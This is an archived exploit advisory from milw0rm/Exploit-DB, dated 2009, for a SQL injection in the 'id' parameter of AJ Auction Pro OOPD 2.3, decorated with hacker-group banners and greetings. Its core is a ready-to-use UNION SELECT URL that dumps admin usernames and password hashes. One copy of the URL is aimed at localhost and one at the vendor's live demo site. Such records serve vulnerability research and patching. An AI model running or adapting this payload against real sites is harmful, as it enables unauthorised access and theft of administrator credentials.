AJ Auction Pro OOPD 2.3 - 'id' SQL Injection

EDB-ID:

7836

CVE:



Author:

snakespc

Type:

webapps


Platform:

PHP

Date:

2009-01-20


==================================================================================================================
=         SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM            = 
=         S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M            =      
+         SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M            +       
=             S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M            =      
=         SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M            = 
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=              	         AJAuctionPro OOPD v2.3 SQL Injection Vulnerability                                      +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =          Discovered By: Snakespc  :::ALGERIAN HaCkEr:::               =     =   
                =                                                                                    =
                =                   :::::Mail: snakespc@gmail.com:::::::                             =
                =                                                                                    =                                                                                   =
                =            http://www.ajsquare.com/products/auction/demo.php  "index.php"          =
                =====================================GAZA=============================================

Exploit:
http://localhost/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users--
********
demo:
http://www.ajauctionpro.com/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users--
============================================================== ALLAH AKBAR=========================================================

Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N:::
ALL www.Snakespc.com/sc >>>> Members 
Str0ke ....Milw0rm
==================================================================GAZA============================================================

# milw0rm.com [2009-01-20]